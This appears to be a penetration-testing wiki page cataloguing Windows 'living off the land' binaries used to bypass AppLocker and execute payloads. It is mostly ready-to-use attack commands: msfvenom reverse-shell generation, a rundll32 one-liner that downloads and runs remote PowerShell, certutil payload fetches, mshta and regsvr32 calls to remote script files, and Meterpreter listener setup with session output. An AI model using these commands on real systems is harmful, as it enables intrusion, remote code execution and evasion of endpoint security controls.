# LOLBas **LOLBas** - Windows utilities Project link:[https://lolbas-project.github.io/#](https://lolbas-project.github.io) ## LOLBas ### rundll32 Rundll32 is a Microsoft binary that can execute code that is inside a DLL file. Since this utility is part of the Windows operating system it can be used as a method in order to bypass AppLocker rules or Software Restriction Policies. So if the environment is not properly lockdown and users are permitted to use this binary then they can write their own DLL’s and bypass any restrictions or execute malicious JavaScript code. #### Rundll32 - CMD In Windows systems that have locked the command prompt via an AppLocker rule it is possible to bypass this restriction by injecting a malicious DLL file into a legitimate process. Didier Stevens has released a modified version of cmd in the form of a DLL file by using an open source variant obtained from the ReactOS. Download the new cmd: Since the rundll32 is a trusted Microsoft utility it can be used to load the cmd.dll into a process, execute the code on the DLL and therefore bypass the AppLocker rule and open the command prompt. The following two commands can be executed from the Windows Run: `rundll32 C:\cmd.dll,EntryPoint` `rundll32 shell32.dll,Control_RunDLL C:\cmd.dll` #### Rundll32 – JavaScript It possible to utilize the rundll32 binary in order to execute JavaScript code that has an embedded payload and it hosted on a webserver. The Metasploit module web delivery can quickly create a webserver that will serve a specific payload (Python, PHP or PowerShell). In this case the payload will be PowerShell. Use: exploit/multi/script/web\_delivery Set LHOST as your IP, LPORT port, payload windows/meterperter/reverese\_tcp And run exploit, on the victim: `rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"` ![Rundll32 - JavaScript](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M4xwp6Mq18nX8yR4M5z%2Fuploads%2FACQVJYx3VogdDeppHJfk%2Ffile.png?alt=media) #### Rundll32 – Meterpreter The Metasploit Msfvenom can be used in order to create a custom DLL that will contain a meterpreter payload: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f dll -o pentestlab.dll` The utility rundll32 can then load and execute the payload that is inside the pentestlab.dll. `rundll32 shell32.dll,Control_RunDLL C:\Users\pentestlab.dll` \*Also can be used with certutil to encode the dll: `certutil -encode TikiThings.dll TikiThings.enc` On target: `C:\> certutil -urlcache -split -f https://pastebin.com/raw/SAeR96bC TikiThings.enc` `C:\> certutil -decode TikiThings.enc TikiThings.dll` ![Rundll32 - Injecting DLL into a Process](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M4xwp6Mq18nX8yR4M5z%2Fuploads%2FdEnXIiBVL0IayhBJOZ1o%2Ffile.png?alt=media) Source: ### MSBuild Originally MSBuild was introduced in order to enable developers to build products in environments where Visual Studio is not installed. Specifically this binary can compile XML C# project files since it has a method called Tasks that can execute a task which is written in a managed code. It is possible to use Metasploit MSFVenom in order to generate C# shellcode which it will be executed on the target system in order to obtain a Meterpreter session. **Use** [**unlock applocker** ](https://infra.newerasec.com/infrastructure-testing/tools/unlock-applocker)**to generate payload automatic** #### Manually: Generate payload: `msfvenom --platform windows -p windows/meterpreter/reverse_tcp lhost=10.10.10.1 lport=445 -f csharp -o meterpreter_445.cs -v shellcode` Append it to the following XML code: ``` ``` upload to the victim: `iwr -uri` [`http://10.10.14.4/meterpreter.csproj`](http://10.10.14.4/meterpreter.csproj) `-outfile a.csproj` Remote File Deployment: ``` wmiexec.py :''@ cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\\\msbuild_nps.xml ``` Make sure you run a meterpreter listerner: ``` msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.17.130 lhost => 192.168.17.130 msf5 exploit(multi/handler) > set lport 443 lport => 443 msf5 exploit(multi/handler) > run ``` Run: ``` c:\Windows\Microsoft.NET\Framework\v4.0.30319>MSBuild.exe C:\Users\David\Desktop\exploit.csproj Microsoft (R) Build Engine version 4.7.3190.0 [Microsoft .NET Framework, version 4.0.30319.42000] Copyright (C) Microsoft Corporation. All rights reserved. Build started 05/11/2019 14:08:15. ``` Hola! ``` [*] Started reverse TCP handler on 192.168.17.130:443 [*] Sending stage (180291 bytes) to 192.168.17.1 [*] Meterpreter session 1 opened (192.168.17.130:443 -> 192.168.17.1:24989) at 2019-11-05 14:08:16 +0000 meterpreter > sysinfo Computer : DESKTOP-41JRS1D OS : Windows 10 (10.0 Build 17763). Architecture : x64 System Language : en_GB Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows ``` **FULL MSBuild shell** ; File Path: ``` C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe ``` #### Call MSBuild without msbuild [MSBuildAPICaller ](https://infra.newerasec.com/infrastructure-testing/tools/msbuildapicaller) ### Installutil Execute the target .NET DLL or EXE using the uninstall method: `InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll` #### **File path** ``` C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe ``` #### Metasploit There is a specific Metasploit module which can be used to bypass AppLocker via the InstallUtil method. `exploit/windows/local/applocker_bypass` This module will generate a .NET executable on the target system and it will utilize the InstallUtil binary to execute the payload bypassing the AppLocker protection. ![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M4xwp6Mq18nX8yR4M5z%2Fuploads%2FXicKB0M4p2z5EJRgRmnl%2Ffile.png?alt=media) ### cmstp CMSTP is a binary which is associated with the Microsoft Connection Manager Profile Installer. It accepts INF files which can be weaponised with malicious commands in order to execute arbitrary code in the form of scriptlets (SCT) and DLL. It is a trusted Microsoft binary which is located in the following two Windows directories. #### **File path** `C:\Windows\System32\cmstp.exe` `C:\Windows\SysWOW64\cmstp.exe` Crete malicious dll: `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f dll > /root/tools/mitre/cmstp/evil.dll` Creating a file (f.inf) that will be loaded by CSMTP.exe binary that will in turn load our evil.dll: ``` [version] Signature=$chicago$ AdvancedINF=2.5 [DefaultInstall_SingleUser] RegisterOCXs=RegisterOCXSection [RegisterOCXSection] C:\experiments\cmstp\evil.dll [Strings] AppAct = "SOFTWARE\Microsoft\Connection Manager" ServiceName="mantvydas" ShortSvcName="mantvydas" ``` Invoking the payload: `PS C:\experiments\cmstp> cmstp.exe /s .\f.inf` Credit: ### Regasm Loads the target .DLL file and executes the UnRegisterClass function. `regasm.exe /U AllTheThingsx64.dll` Loads the target .DLL file and executes the RegisterClass function. `regasm.exe AllTheThingsx64.dll` File path: ``` C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe ``` ### Mshta Executes code inside evilfile.hta. `mshta.exe C:\poc\evilfile.hta` Executes remote SCT file `mshta.exe javascript:a=GetObject("script:https://gist.github.com/someone/something.sct").Exec();close();` Executes hta file from external webserver `mshta.exe` [`http://webserver/payload.hta`](http://webserver/payload.hta) Example: `mshta.exe` [`http://192.168.1.109:8080/pKz4Kk059Nq9.hta`](http://192.168.1.109:8080/pKz4Kk059Nq9.hta) #### File path: ``` C:\Windows\System32\mshta.exe C:\Windows\SysWOW64\mshta.exe ``` #### Example for hta: ``` Set objShell = CreateObject("Wscript.Shell") objShell.Run "powershell -noP -sta -w 1 -enc " ``` #### Unicorn: `root@Kali:/opt/unicorn/# python /opt/unicorn/unicorn.py windows/meterpreter/reverse_tcp 172.20.10.3 4444 hta` SharpShooter `root@Kali:/opt/SharpShooter# python SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ~/Downloads/cobaltstrike_payloads/payload2.cs --sandbox 4 --smuggle --template mcafee` ### hh Binary used for processing chm files in Windows Paths: `C:\Windows\System32\hh.exe` `C:\Windows\SysWOW64\hh.exe` Download Open the target PowerShell script with HTML Help. \ `HH.exe` [`http://some.url/script.ps1`](http://some.url/script.ps1) Execute Executes calc.exe with HTML Help. \ `HH.exe c:\windows\system32\calc.exe` ### Regsvcs Loads the target .DLL file and executes the UnRegisterClass function. `regsvcs.exe /U regsvcs.dll` Loads the target .DLL file and executes the RegisterClass function. `regsvcs.exe regsvcs.dll` File path: ``` C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe ``` ### Regsvr32 We will run a malicious sct file: ``` ``` We need to host the back.sct on a web server so we can invoke it like so: `regsvr32.exe /s /i:http://10.0.0.5/back.sct scrobj.dll` #### Metasploit Metasploit Framework has a specific payload which can be used to bypass AppLocker via the Regsvr32 utility automatically. `exploit/windows/misc/regsvr32_applocker_bypass_server`